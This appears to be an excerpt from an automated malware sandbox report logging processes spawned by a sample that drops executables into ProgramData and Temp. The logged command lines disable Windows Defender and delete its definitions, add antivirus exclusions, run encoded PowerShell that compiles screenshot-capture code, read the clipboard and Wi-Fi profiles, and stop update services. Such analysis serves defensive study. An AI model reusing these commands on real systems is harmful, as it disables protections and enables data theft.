Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe -pbeznogym	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Process created: C:\ProgramData\svchost.exe "C:\ProgramData\svchost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_MEI66162\s.exe	Process created: C:\ProgramData\setup.exe "C:\ProgramData\setup.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
Source: C:\ProgramData\svchost.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe"
Source: C:\ProgramData\setup.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe "C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.cmdline"
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6DA.tmp" "c:\Windows\System32\CSC43F2928123D49B6B141C06767811123.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFC3.tmp" "c:\Users\user\AppData\Local\Temp\eodmidm4\CSC7CD01418C841459A9A462A9B35F4C645.TMP"

Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
Source: C:\ProgramData\Microsoft\based.exe	Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab

Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe

Code function: 0_2_00DA27A9 cpuid

0_2_00DA27A9

Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_00DAD0AB

Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
Source: C:\ProgramData\Microsoft\hacn.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI66162\base_library.zip VolumeInformation	Jump to behavior
